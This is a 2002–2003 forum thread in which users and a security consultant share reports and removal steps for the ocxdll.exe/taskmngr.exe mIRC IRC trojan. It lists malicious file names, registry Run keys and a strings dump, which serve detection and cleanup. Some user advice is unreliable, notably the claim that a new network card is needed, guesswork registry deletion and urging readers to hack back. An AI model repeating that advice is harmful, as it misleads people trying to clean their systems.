If you have ocxdll.exe, please zip it up and send it to me at kyle@kylelai.com and maybe I can tell you if the attackers modified the filenames.

Can you guys tell me when you get affacted by this virus? I heard there was a series of attacks around 10/23... Can you guys confirm this?

Good Luck,
/Kyle

Kyle Lai Consulting
www.kylelai.com
aladin168@hotmail.com
kyle@kylelai.com

Kyle Lai
aladin168@hotmail.com
10/29/02
Can you guys fill out this quick survey to share the information. It would be helpful for incident response people like me to analyze the situation better.

Survey:
--
1. What's your infected Operating System?
2. What Service Packs were installed (if any)?
3. What's the time of the infection (approximate)?
4. What actions have you taken?
5. Did you reset the password for your administrator accounts?
6. Did you ever see ocxdll.exe as an infected file?
7. Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
8. Did you ever see mt.exe? A possible dDos client.
9. What Anti-virus software do you use, and did it identified irc/flood trojans?
10. Did you see the virus coming back and alarmed by your Anti-virus program?
--

Thank you very much for your help!

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com

David
slimer@slimer.co.uk
10/29/02
1. What's your infected Operating System?
Win2k 5.00.2195
2. What Service Packs were installed (if any)?
Service Pack 2
3. What's the time of the infection (approximate)?
23rd October 2002
4. What actions have you taken?
Deleted files mentioned above.
5. Did you reset the password for your administrator accounts?
Yup
6. Did you ever see ocxdll.exe as an infected file?
Yup
7. Did you ever see ncp.exe? If not, can you please do a search? It's a hacker's program.
I did have it, previous post of mine aying it wasn't there was incorrect.
8. Did you ever see mt.exe? A possible dDos client.
No, did not see this one.
9. What Anti-virus software do you use, and did it identified irc/flood trojans?
Grisoft AVG (I am a cheapskate) It recognised C:\WINNT\SYSTEM32\OCXDLL.EXE:\winhp32.exe Trojan horse IRC/BackDoor.Flood Anti-Trojan 5.5 recognised and cleaned ncp.exe
10. Did you see the virus coming back and alarmed by your Anti-virus program?
Virus did not return after deletion.

Cheers

David.

Barbara Smith
barbara@rgpdental.com
11/01/02
I must add my thanks to all. I had just this week discovered the IRC Trojan and had the same problem as Pam with the hide window error (in addition to several other issues). Symantec AV CE did not find the source but Swat It did. Nice going for a free utility.
Mike
mikepehlivan@rogers.com
11/03/02
I found all of the aovementioned files except mt.exe and ncp.exe in a folder in program files\accessories\expl32

They were easily removed, but my folder was not deletable because of a sharing violation, and the registry entry was removed as well.

I'm about to reboot my computer and hope that nothing will be messed up.

The only reason I even began looking into all of this was because random ads started appearing on my screen for diplomas and crap -- the kind of stuff you find in spam e-mails. It was an unidentifiable program in a window, and once you closed it, it just went away. Then I found this winmngr.exe file in my task manager and thought it was it. When I searched online, I found this thread.

I'm just telling you my train of events, maybe others have experienced a similar train? Maybe the ads are related to this worm?

E-mail me with the subject line "TASKMNGR" at mikepehlivan@rogers.com if you have any information for me or if I can provide any for you.

Thanks,

Mike

Archie

11/04/02
Hi, I got this nasty thing too. Unfortunately, I don't know that much about computers, so thanks for everyone's help. I'm running Windows 2000 Professional at home on a personal desktop (no network set up). I think I got infected around 10/23-10/25. Swat It found ncp.exe (Network Crack Wizard 99) and wnhp32.exe (GT Bot Frozen Bot hide), and NAV finally started kicking too for other files. After I followed the registry instructions, things started clearing up. I also installed zone alarm just prior to deleting the infections and found that taskmngr.exe was trying to access the internet (IRC) every time I booted up. Does anyone know if this item, found in my registry has virus potential? RUNDLL32.EXE NvQTwk,NvCplDaemon initialize Thanks, Archie
Scott

11/05/02
So how is it for sure that I can rid my home network of this virus in other words what is it that I need to do in order to get rid of "mIRC" off of my computer? Please help me I am so tired of this. Also once I have it gone what else do I need to do in order to secure my home network and is it true that I am going to need to change all of my passwords?
Lane
DPS_Lane@hotmaail.com
11/06/02
A Trojan Worm..
Well it looks like they've morphed it ! My customer who'd been hit last month by the taskmngr.exe got hit again but this time it called winclock.exe. I'm not the IT contractor correcting this so i dont't have any other info. But beware.
john

11/06/02
I've had this virus twice already, and everytime the only way i thought i could get rid of it was to reinstall win 2k pro, which i did. Now, thanx to everyone here, i'm running swat it as well as sygate firewall pro, and hopefully it won't return. I got a small question though: Do i still have to put a password for administrator at startup, or can i leave it blank if i'm running a firewall?
Thanx
David
slimer@slimer.co.uk
11/07/02
Word of friendly warning, the Anti-Trojan 5.5 programme mentioned above found a trojan on my computer, but missed 5 others. Norton are doing a 15 free trial on its 2003 AV, it seemed to spot the others.
Kyle Lai
aladin168@hotmail.com
11/07/02
For Archie, Scott, John and others:

If you were hit by this virus/Trojan, and variants of the original virus/Trojan, YOU BETTER CHANGE YOUR PASSWORDS, and make sure it is something harder to guess. DEFINITELY NOT BLANK!

I heard the new variants might get your user ID and passwords and credit card info if they are on the computer, so beware!

This thread is getting long, and if you missed the link to my original analysis, they are at:
Part1:
http://groups.google.com/groups?hl=zh-TW&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209050049.24860609%40posting.google.com

Part2:
http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&selm=bf0f8e77.0209080706.7f395b0c%40posting.google.com

They might not apply to the latest variants, but from what I have seen so far, the malicious files are listed below:

ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
--
New Files:
--
BACKUP.BAT
NT32.INI
PSTOR.EXE
WINHP32.EXE
DDSHARE.EXE

If you are attacked more than once, that means your system is still vulnerable.

I can't stress enough... Make sure you:
1. Get the 4 FREE anti-virus, firewall, anti-trojan software from my posting on 09/24/02 above.
2. Install and Run your Anti-Virus and clean the viruses. Schedule it to run every day.
3. Install and Run SWAT-IT and clean the Trojans. Run it once a week.
4. Install Personal Firewall (zonealarm) or a hardware firewall with Router for DSL or Broadband.
5. Change your ADMINISTRATOR password
6. Change all passwords for your user accounts. The attacker might have gotten a copy of UserIds and Passwords already.

Good Luck!
/Kyle

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com

Kayne

11/10/02
Grr. This is one annoying virus. Today I decided to disable Zonealarm for about 5 minutes while I did some benchmarking. Big mistake. I never thought a virus could actually be uploaded when there were no active programs running with a connection to the internet. I suppose I was taught a lesson today. What alerted me to the newly uploaded program was when 3dMark quit out on me halfway through the benchmark because adobea.exe took away window focus. I then did a search for files created, and adobea.exe appeared with a few others. The funny thing is, I did a search for new files created about 10 minutes before I started the benchmark because I was looking for files left over from a previous installation of Asheron's Call 2. The adobea.exe file was not in there. I would have noticed it. So I'm guessing that basically what happened was when I disabled ZoneAlarm someone connected to my ip and proceeded to upload the files. Didn't know it was even possible, but apparently it is.
Sara
Mod_grrl@yahoo.com
11/10/02
i've followed all the instructions above but am not as familiar with the commant prompt as i suppose i should be and am having trouble restoring my security settings back to default. i am running Windows2000Pro and have scanned the files and whiped everything out and changed all my passwords, if someone could email me and give me and slight nudge in the correct direction, i would really really appreciate it.

s

Kayne

11/11/02
I ended up just formatting and reinstalling everything from scratch after cleaning up the virus. I just didn't trust my system being totally clean after seeing how much stuff this thing changes.
Akul

11/11/02
rhino,
Hello,

I found that Rhino (some ftp program) was being installed on it's own on my comp. Previously, in last week, Norton antivir did detect ICR trojan "c:\winnt\fonts\*.INS" were the infected (and quarantined) files. Recently I did install Quicktime application. I wonder there is any conection observed by few. I do have Windows2000Pr and administrator with no passwd. I wonder if I am further at any risk.

Is Zonealarm a good firewall. I am serious about installing it!

-Akul

Kyle Lai
aladin168@hotmail.com
11/12/02
Zonealarm is a good firewall for home users. It's fairly easy to install and use. It keeps out most of the malicious incoming traffic.

If you don't have a personal firewall, you probably should consider installing it. You can learn more from their website, www.zonealarm.com

/Kyle

Randy

11/13/02
The taskmngr.exe has been renamed in the newer virus.
Its now task32.exe.

Here's a list of the files I found.
dll16.ini
dll32nt.hlp
nt32.ini
ocxdll.exe
task32.exe
xvpll.hlp

The registry entry above refers to task32.exe now instead of taskmngr.exe.

Thanks for the info.

Kyle Lai
aladin168@hotmail.com
11/14/02
Randy,
If you still have the ocxdll.exe file, please send it to me at kyle@kylelai.com. I'd like to see what new stuff they have add to this trojan.

Can you please let us know when you first noticed the infection? and what system was infected?

Thanks,
/Kyle
Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com

Mickael Hall
mjahall@hotmail.com
11/17/02
Hi,

Norton Anti-virus found this on my m/c yesterday. It did not identify all the files from Kyle's message of 11/07 but it at least alerted me to the problem. I followed Kyle's (Thanks) instructions for removing and have removed all the files mentioned above and restored user rights assignment for the Network. I no longer get the secedit cmd window on bootup. When I scan again for viruses, NAV finds none, however realtime protection finds the following:-

A0095786.BAT IRC Trojan C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP297\ Infected

and:-

_REGISTRY_USER_.DEFAULT IRC.Mimic C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP298\snapshot\ Infected

When I try to access the c:\system volume information directory, I get access denied even though I am logged in as an administrator.

Anyone else seen this? Any ideas how to proceed?

Thanks,

Mickael

ykje
otto72@hotmail.com
11/17/02
IRC/Flood virus
I have "IRC/Flood.k.dr.c" and "IRC/Flood.am" on my computer and I can't figure out which HKEY to delete. Does anyone have a suggestion?
ant

11/19/02
i have the same virus/trojan issue. cleaned all the files, removed everything i could but kept getting mIRC at startup. BUT i didn't have taskmngr.exe on my drive anywhere. so when i tried to delete it from registry, it wasn't there. SO i found out the run32dll in my registry activates a file called winnt/system32/task32.exe. this is as of 11-19-02 so maybe a new strain of the virus/trojan??? keep aware
Kyle Lai
aladin168@hotmail.com
11/20/02
Ant,Ykje, Mike
Did you see ocxdll.exe detected as a mirc trojan by your antivirus software?, and was it TASK32.EXE you detected? Also, when did you first detected the virus?

If you or anyone still have a copy of the trojan that spawned task32.exe, please send it to kyle@kylelai.com. I'd like to keep track of the variants of this virus. It seems to spread pretty fast. I know 3 variants so far. The hackers definitely know that people are not patched, either don't know, or don't have time, or don't want to...

To remove Trojan from the registry, you need to check registry entries at the following locations: (for complete info on where Trojan might reside in your computer, check out http://www.kylelai.com/trojan_paper.htm)

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com
www.kylelai.com

Mickael Hall
mjahall@hotmail.com
11/20/02
OK, I've had the chance to monitor it a bit longer now. In answer to Kyle:-

The ocxdll.exe was detected as blank by NAV. The other files backup.bat, dll32.hlp, xvpll.hlp were detected as IRC Trojan and default, _registry_user_.default A0095786.bat, A0095787.hlp and A0095789.hlp were detected as IRC MIMIC. Other files on your list such as taskmngr.exe which were on my machine (and since removed) were never detected by NAV. I can send you the NAV log file if you like.

NAV was not installed correctly before I started to notice the secedit command window. I noticed it happening on October 28th. The only thing I had downloaded on that day, were a VPN client attached to an email sent to me from Work. I am assuming that was clean as it would have been scanned by work and I have not heard of anyone else there with the same problem. I had done a Windows update 2 days before and it is possible I just did not notice it then. Anyway, it was after a few days that I took the time to get NAV working properly and it found it (after a live update) on the first manual scan.

I no longer get the secedit cmd window and NAV does not detect any virus on a manual scan, it only detects it in the c:\system volume information directory on a realtime scan. I can't access that folder (it is hidden by default, but I changed that), I get Access denied although I am logged in as an Admin.

The last infected file NAV found was today:-

20/11/2002 15:40 _REGISTRY_USER_.DEFAULT IRC.Mimic File Quarantined DOODLES mhall C:\System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\RP301\snapshot\ Infected Quarantine Clean virus from file Quarantine infected file Realtime scan

It is now finding one of these per day, exactly the same but with RPxxx being incremented by one each time. I am deleting them everytime NAV finds one. I believe these are backup files used to restore Windows XP. When I search the registry for the same GUID, it finds it in 4 places:-

HKEY_LOCAL_MACHINE\System\Controlset003\Control\BackupRestore\FilesNotToBackup\System Restore. The value is \System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\* /s

HKEY_LOCAL_MACHINE\System\Controlset003\Services\sr\parameters\MachineGUID with the value {09EB170D-7904-4451-AD52-778A1BB0050C}

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\BackupRestore\FilesNotToBackup\System Restore, with the value \System Volume Information\_restore{09EB170D-7904-4451-AD52-778A1BB0050C}\* /s

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\sr\parameters\MachineGUID, with the value {09EB170D-7904-4451-AD52-778A1BB0050C}

As far as cleaning the registry as per your post, I only found taskmngr.exe in [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] and deleted it. There is another key in there called SSCFBTN.exe - it may not have anything to do with anything but I have no idea what it is, the rest of the entries seem OK.

In [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] I have MSMSGS with the value "C:\Program Files\Messenger\msmsgs.exe" /background which I am assuming is just MSN Messenger, but then again, I would have assumed taskmngr.exe was just the task manager.

Sorry for the detail and some of it is probably irelevant. If it helps or if you have any more information on how I might get rid of the virus in c:\system volume information issue, let me know.

Thks,
Mickael

Ryan Wahlquist

11/21/02
Mickael- I am finding the same problem getting rid of this virus. I have deleted every known file associated with it and still about 4 times a day am com ing up with message saying C:\system volume information\.. file is infected with trojan.irc bounce. I cannot access the folder and have only just come up with the idea of disabling the system restore feature on XP and trying to restart in safe mode and delete that file folder. Theoretically XP will fix any system files deleted during this process and if not I can always restart using XP disk and fix install friom there. I will let you know if it works. If of course anyone has a better idea please let me know by posting.

Ryan

Ryan Wahlquist

11/21/02
OK Michael- Here is what I have found. That damn folder is associated directly with the system restore points created in XP. All of the infected files you are coming up with are points that were created while your computer was infected. I personally believe that as long as Norton is coming up with that message it will continue to create "infected" restores. I am going to turn off the system restore and attempt to clean the restore points out of there. As to how to acces the folder see the folwing article--http://www.jsiinc.com/SUBI/tip4400/rh4453.htm

That's about all I got for now.

Ryan

Kyle Lai
aladin168@hotmail.com
11/21/02
Michael/Ryan,

When did you get infected?
What is your operating system?
What service pack level are you at before and after you are infected?
What have you done after you were infected?
How did you attempt to remove every virus files, either successful or not?

If you have the original ocxdll.exe, or the original infected files, please zip it up as ocxdll.exe.txt, and zip it up and send them to me. I'm interested in seeing that has changed from the first variant. Please send it to kyle@kylelai.com

Thanks,
/Kyle

Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com
www.kylelai.com

Kyle Lai
aladin168@hotmail.com
11/21/02
Just a side bar,
Astalavista.com has recompiled 2 parts of my original ocxdll.exe/taskmngr.exe trojan analysis into an easy to read format on 11/13/2002.

http://www.astalavista.com/trojans/library/trojans/analysis/mirc_trojan_analysis.shtml

It includes the summary from my webpage (www.kylelai.com/mIRC_Virus_Analysis.htm) as well. This analysis was done back in late August and early September on the original version of the trojan.

Several new variants have been reported in this discussion group, and I am trying to keep my webpage up to date.

/Kyle
Kyle Lai Consulting
aladin168@hotmail.com
kyle@kylelai.com
www.kylelai.com

Mickael Hall
mjahall@hotmail.com
11/22/02
Ryan, Thanks for the info, I managed to get into the folder and will also try to clear them out.

Kyle,

I ran NAV on the directory now that I got rights and it found a0095788.exe which was a compressed file containing backup.bat, dll32.hlp and xvpll.hlp. The a00 name is just an XP backup naming convention, I'm 90% certain it is the original ocxdll.exe. I have renamed it a0095788.exe.txt and sent it to you.

What seems strange is that it also found infected _registry_user_.default files in backup folders previous to this one. The exe above was found in RP297, but the infected _registry_user_.default was found back in every folder since RP285. Also strange is that NAV never found these before. Maybe it was the access rights issue.

As Ryan says, XP is creating an infected backup of _registry_user_.default every day which I think is the HKEY_USERS/.default folder in the registry. I had a look in there and found HKEY_USERS/.default/software/Mirc/dateUsed with a value of 1035660900. It could be innocent. I no longer have Mirc installed on my machine.

In any case, after clearing the infected files from the backup folders, I am going to restore back to a point before 26/10 which is when I think this started. I'll let you know how I get on.

Mickael

David

11/22/02
HELP!!

My computer is infected with a virus that I cannot delete or clean. Whenever I try to access any website, I get the message "Hide Window Error" window not found.

Is there anyone out there that can explain in layman terms what I need to do in order to get rid of this virus?

Thank you

Kyle Lai
aladin168@hotmail.com
11/22/02
David,
Seems like You are infected with a virus.
Simplest way is to run an Anti-Virus and Anti-Trojan software. As I mentioned in my earlier posting, you must run Antivirus, Anti-trojan, and install a firewal. There are 4 FREE software I listed on 9/24/2002 which will give you a good start.

In terms of your problem, there might be a virus calling the hidewindow program (part of the virus) trying to hide the window of a program. However, the name of the window was either misspelled when it called hidewindow, or the program the virus tried to hide has been terminated. Since hidewindow program could not find the right window to hide, it generated an error message, and that was what you saw.

Hidewindow program is usually used to hide the GUI of programs specified in its configuration (parameters). Once a program is successfully hidden by hidewindow, you will not see the GUI, but you can see its process in the task manager. For example, if the hidewindow program is specified to hide your Windows Explorer, and if it's successful when you starts Explorer, there might be a flash of Explorer, then you will not find Explorer anywhere. You can only see its process in the process list in the task manager.

Hope this helps.
/Kyle
Kyle Lai, CISSP, CISA
www.kylelai.com
kyle@kylelai.com

hookmeister

11/24/02
servudaemon.exe
and
task32.exe

get them out of the registry and delete.
thanks/Kyle -

Kyle Lai
aladin168@hotmail.com
11/25/02
Can someone send me the ocxdll.exe variant that had the file TASK32.EXE?

I am interested in analyzing different variants.

I am planning to write a part3 of my ocxdll.exe analysis series discussing about the variants.

Thanks,
/Kyle
Kyle Lai Consulting
www.kylelai.com
kyle@kylelai.com

Mickael Hall
mjahall@hotmail.com
11/26/02
Ryan,

Did you have any luck with the System Restore? I cleared out all the files (you can just switch off system restore to do that). NAV detects no virus on a manual scan, but as soon as I switch system restore back on, realtime protection finds it in _registry_user_.default that system restore creates.

Mickael

Lady_Gamecock

11/26/02
Stupid Trojan
Folks,

I want to thank each of you for providing such great information concerning this trojan. Without your help, I would have been stuck. Went and did all your suggestions and I feel confident that my computer should be ready to roll now.

Thanks again! Keep up the FANTASTIC job!
Lady_G

Jessica

11/27/02
Thank you the information you provided. I installed the anti-trojan software and got rid of several viruses that Norton Antivirus software could not detect. I am no longer receiving the "HideWindow - Error" message, my computer is running again at normal speed, and I feel as though my data is more secure.
JCN

12/02/02
FYI - For any of you with the virus who are unable to open critical webpages, I'm seem to be working with the 8/28 version of the virus, and I discerned that it only comes up on pages that contain java elements, such as Front-Page components or games or such, and only occurs in IE! If you open the same page under Netscape it works fine (for me). I do seem to have a lower level of infection however, as some of the files an issues described by others I do not seem to have...
Ryan Wahlquist

12/03/02
Mickael- I have figured out the problem. You were correct in saying that the files that continually come up as infected are system restore points. The easiest way to get rid of them is to go to system restore and turn it off. This will erase all system restore points on your computer. After you have shut it off restart your computer and run Anti-virus software again to make sure all files are gone. After this turn system restore back on and I would suggest seting a restore point to go back to.
As to your other question I had no luck getting rid of them through system restore as there were mutiple restore points infected as the machine took a restore point of the computer while it had a corrupted restore point. It was a twisted cycle so I just nuked em all and started with a clean restore point. It has been working now on a clean system for a week with no reoccurances. Any questions feel free to post.

To all other users- if you are on a home LAN, even behind a router, you might download and install Zone Alarm as if you ever open ports for gaming you will get hit with people trying to get onto your computer and as there have been multiple articles written XP and 2000pro are open to attacks in the security systems.

Ryan

Ryan

12/03/02
Sorry Mickael it was a case of not completely reading your post..duh. I cleaned the restore and ran the scan. It was gone after that. Did you restart your machine before turning system restore back on? It cleans the system and gets rid of current user info so that when the restore point is set there should be no traces of virus left. I would turn off computer then restart and run a complete scan, turn off again and only then set your restore back to on. It worked for me.
Another thing you might check is your user accounts and set a password for admin that only you would know. I would also disable the guest account so the only active account is administrator. This will help keep unwanted people out of your computer.

Ryan

ykje

12/06/02
Thanks for your help. I was looking at a black screen (not the screen of death fortunately) for 5 days and finally I found which key to delete. It was grim and I wish I had kept a record because I read that anyone interested in this virus needs to know what the critical keys are ... but the paperwork is lost on my desk. The good news is that backdoor virus is not fatal, it can be safe to be online. The bad news is that the future includes a new harddrive. A new network card ($10) is also a good idea since this is the core of the compromised IP address. Backdoor viruses are ugly, what can I say. The messages they leave are threatening, low class, base and uneducated. Become a hacker, fight back ... after all ... hackers are tunnel visioned.
ykje

12/06/02
Neglect all the advice about antivirus software ... clearly they don't realize that you have antivirus software that can't clean the virus. Go to start, run, type in 'regedit' and you are into the registry keys. This is where it becomes somewhat difficult because you have to know what your system needs in order to run and what doesn't belong. In addition you have to be confident enough in your decision to simply execute decisions about deletes. When you find a file name that looks unusual, research it on the web, don't believe everything you read and descriminately delete files. Hopefully, you will not have to do a complete re-install. Good luck ... and even girls can fix it so that means anyone can do it.
Chris

12/09/02
One of my users just got hit by a varient of this when she took her laptop home and connected it to her home cable modem (no Firewall of course).

She got tipped off when the local Anti-Virus program detected an infected file and fortunately disconnected and brought it to me.

The Anti-Virus Software (we use InoculateIT by CA) was next to useless for detecting this stuff. It picked up the one infected file (AdobeS.exe) which I think was part of the payload placed on the laptop but missed alot of others that I know are also a problem.

Anyway this definately seems to be a varient of the above Trojan... the main difference being some of the file names. The main file it has set to run automaticaly on startup in the registry is syscfg32.exe They also downloaded a program called screwed.exe to the users laptop. I haven't researched what it does yet.. but I'm sure it's not pleasant. Going to do a low level format, a complete system wipe and restore.

By the way whoever did this left files indicating the IRC channels & FTP servers they were using for this exploit, including thier own passwords in plain text. Would be happy to e-mail copies of those along with anything else thought would be helpfull in researching the issue to anyone who was interested.

Good thing I stumbled on this thread via Google search. There is hardly any info available about this elsewhere... including the AV vendors sites

Kyle Lai
aladin168@hotmail.com
12/11/02
There were more people talking about AdobeS.exe so I took a quick look at it (from a file someone sent to me), but didn't run this EXE on my test system. In the hex editor, I noticed a section of strings below. I can't be 100% sure exactly what it does, but base on the binary code, it "might" download and hide porn stuff on the compromised system. It is written in VB 5 or VB 6.

If you have the original AdobeS and AdobeA.exe, please send it to me at kyle@kylelai.com. I just want to verify the contents from different sources.

Thanks,
/Kyle

Kyle Lai, CISSP, CISA
www.kylelai.com
kyle@kylelai.com

Here is the section of strings in the AdobeS.exe:
--
HideMyPornoExe
`g:
`g:
HideMyPorno
HideMyPorno
Form1
`g:
VB5!
cold
HideMyPornoExe
HideMyPornoExe
, @
`g:
HideMyPorno
HideMyPornoExe
`g:
`g:
`g:
`g:
Form
+3q
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
`]_
VBA6.DLL
--

Mitch D

12/18/02
Looks like I've got the dreaded OCXDLL.EXE trojan. McAfee can detect what it reads as 7 "viruses" yet of course it can't delete them (well, it says that it has deleted them, but I can re-scan straight away and they'll be back again).

Finding this thread has been a miracle for me. I searched for several of the files that Kyle initially listed above and found each one that I searched for - kill, ocxdll, dll16 etc

My big question is, I really don't have the confidence to go into my system to make all the changes that it seems I must do in order to rid my system of this scourge. I will have a professional come over to help, but in the meantime I would certainly like to at least delete the known trojan files that I'm locating. If I were to simply delete the files (effectively, performing only step #1 out of 6 steps), will I be doing any good? Or worse, will I end up damaging my system? I'm sorry if the question seems naive. Any input would be greatly, greatly appreciated.

Mitch

Kyle Lai
klai@klcconsulting.net
12/19/02
Hi Mitch,

First of all, please let me know what operating system you are using.

If you have Windows 2000, then ignore the XP system restore instructions.

If you do have XP, disable the "system recovery" mode, do the virus scan, then reboot your system, and re-enable the automatic recovery. The instruction for disabling system recovery is on the Symantec website:
http://service1.symantec.com/SUPPORT/tsgeninfo.nsf/7e7f15291a25d938882567e50048a048/5065b3834b10031488256b0900255ea7?OpenDocument

Let's do the following things. (Both Win 2000 and XP)

1. Make sure you have the latest virus definition from McAfee. If you haven't done so, do that and scan again.
2. Make sure download swat-it from www.lockdowncorp.com and do the scan on your system. This is free anti-Trojan software. Scan your computer and it should remove a lot of Trojan files that got left off by McAfee.
3. Change all of your administrator password and all passwords on the system, and change your password on your web mail and web accounts, also, watch out for your credit card for the next couple weeks or couple months and make sure the numbers are not stolen. If you don't shop online, this is not an issue. Some online stores the credit card info on your system (cookies).
4. Download zone alarm from zonealarm.com. It is a free personal firewall.

If you have XP system, make sure you follow Symantec's instruction on the system recovery mode before you start removing the viruses.

If you are interested in reading the whole analysis on the ocxdll.exe virus, you can read my article published at Astalavista.com. The link is at my website, www.klcconsulting.net

Hope this helps. Happy Holidays!
/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Kyle Lai
klai@klcconsulting.net
12/19/02
There is another virus/trojan/worm on the surface.
It was called Lioten, a.k.a. Iraq_oil (iraq_oil.exe). It is similar to the ocxdll.exe / taskmngr.exe. It is also using port 445 (SMB over TCP/IP), which only exists on Windows 2000 and XP.

This trojan also guessed administrator and user id and passwords like ocxdll.exe / taskmngr.exe.

I have not yet analyze the Lioten trojan so I am not sure if it is associated with ocxdll.exe in any way. Stay tune.

/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Mitch D

12/19/02
Hi Kyle,

Thank you so much for getting back to me. I am using Windows 2000. I update McAfee each week but it just can't seem to delete these files. I installed AVG and it's the same deal - it can detect but it can't delete.

I've been using Norton Firewall for the last few years. I can only imagine that I got infected during a brief time where I disabled the firewall because I was having trouble with a download and thought the program was the cause. In any case, I'm certain that the Trojan has mutilated the Firewall because, while I still get prompts about ActiveX controls etc, the Firewall has not warned me of an "attack" in months, whereas it used to issue these warnings on a daily basis!

I've got Anti-Trojan installed. For some reason, when I tried to download Swat It, something went amiss and the program when opens "partially" for lack of a better way of putting it.

Back to the initial question, if I were to simply delete the OCXDLL-related files without doing the other steps, would I be making a terrible mistake or will it at least get rid of these files for good?

Thanks again for you help. You have no idea how much I appreciate this!

Mitch

Mitch D.

12/20/02
Update: I deleted every file I found from your list, but there were several notable ones that I couldn't find with a hard drive search - namely dll32.ini and httpsearch.ini. HOWEVER, McAfee virus scanning detected *both* of these files in the botsetups directory - along with (presumably duplicate) files of OCXDLL.EXE, NT32.INI and a few others. The problem is, there seems to be no way to manually delete these files! When I open the botsetups folder, none of these files appear to be there, yet McAfee consistently indicates that this folder is precisely where they are. Is there a trick I can use to get to these files? I assume that they're being masked somehow.

Mitch

dan

12/20/02
since this is a trojan virus its best for you to get a firewall any kind free or not just block the ip of people who are trying to connect to your computer thru ICMP and TCP and block connections to server with port 6669
Kyle Lai
klai@klcconsulting.net
12/21/02
Here are 2 things worth mentioning:

1. *** For people having problem deleting some executable files related to this ocxdll.exe Trojan/worm/virus, i.e. winhp32.exe, they were somewhat protected. However, you can probably successfully delete these files by renaming them from ˇ§.exeˇ¨ extension to ".txt". What a nasty thing they did...

2. mIRC Trojans use standard IRC ports (mostly 66 ˇV 6669) plus other ports, and sometimes they create backdoors in case the victims were blocking the standard IRC ports. In the case of the ocxdll.exe I have seen, it opened a backdoor port, 60609, so blocking IRC ports is just not enough.

In order to guard against this type of worm/virus/Trojans, application level personal firewalls would be my choice. These types of firewalls check each application specific incoming and outgoing connection attempt, which is the most effective way to protect systems. These types of firewalls will not let unknown incoming or outgoing traffic to pass the system. If unknown connection attempts are detected, these types of firewalls will ask for users' decision to permit or deny the connections.

For example, if a new virus/worm/Trojan gets into a network of 50 computers where each desktop has an application level personal firewall, this new Trojan/worm might not do as much damages comparing to a network without them.

/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net

Tim
thunger@wyndham.com
12/26/02
Hey All! I was pleased to see this discussion about the virus. My computer was very imfected. Did anybody notice a bunch of *.eml files on the system? I had about 332 mb worth of these files. The filenames appeared to look like valid email files (very clever), but they were widespread throught the entire drive: one .eml file in eac directory.

I do not know much about viruses, but I am trying to clean things up..

Thanks for your help!
Tim

RG
sumcousa@yahoo.com
12/27/02
Kyle,

Somehow I keep getting the HideMyPornoExe prompt with a run time error message every time I reboot my WIN2K machine. Any suggestions on getting rid of it?

I'm running the current Norton AntiVirus. Dual Pentium III.

Thanks,

RG

Kyle Lai
klai@klcconsulting.net
12/29/02
RG,

HideMyPornoExe is not a pleasant name for a window is it? :)

HideMyPornoExe seems to be the hide window program.

Base on the symptom you described, it might indicate that your registry still has the registry value inserted by the virus/worm/trojan.

Here is what you should consider checking the windows registry:
1. Goto start->run and type "regedit"
2. Goto the following registry keys and identify string value "Run32dll" with data like "taskmngr.exe", "task32", "ocxdll.exe" or something suspicious.
a. HKey_local_machine//software//microsoft//windows//CurrentVersion//Run
b. HKey_local_machine//software//microsoft//windows//CurrentVersion//RunOnce
c. HKey_local_machine//software//microsoft//windows//CurrentVersion//RunService

3. Once you identified the infected registry value, delete that registry value. ***MAKE SURE YOU SELECT "RUN32DLL" REGISTRY VALUE ON THE RIGHT SIDE OF THE WINDOW. YOU SHOULD ONLY SEE 3 CHOICES WHEN YOU RIGHT CLICK: "MODIFY", "DELETE" AND "RENAME". IF YOU SEE MORE THAN 3 CHOICES, YOU ARE AT THE WRONG PLACE AND DO NOT CLICK "DELETE". IF YOU SEE ONLY 3 CHOICES, THEN RIGHT CLICK AND SELECT "DELETE." ***

That should stop this virus/worm/trojan from starting up each time you reboot your system, which will eventually stop the windows pop-up.

MAKE SURE you change your administrator and all user account passwords, or you will be infected again because the worm/trojan already reported your passwords back to the Trojan owner(s)...

Good luck!
/Kyle
Kyle Lai, CISSP, CISA
KLC Consulting, Inc.
www.klcconsulting.net
You can check

Mike Ranger
rngrmyk@yahoo.com
01/08/03
I am impressed with this thread and all the helpful suggestions, however I have not seen the problem I am having discussed. Of course I am old and getting senile so it might have been covered ;-) Anyways, I believe I have the hide windows virus, my problem is my Windows 2k (build 2195) hangs on the after log in screen. At first I thought my harddrive went bad, but ruled that out when I noticed the screen saver still came on.

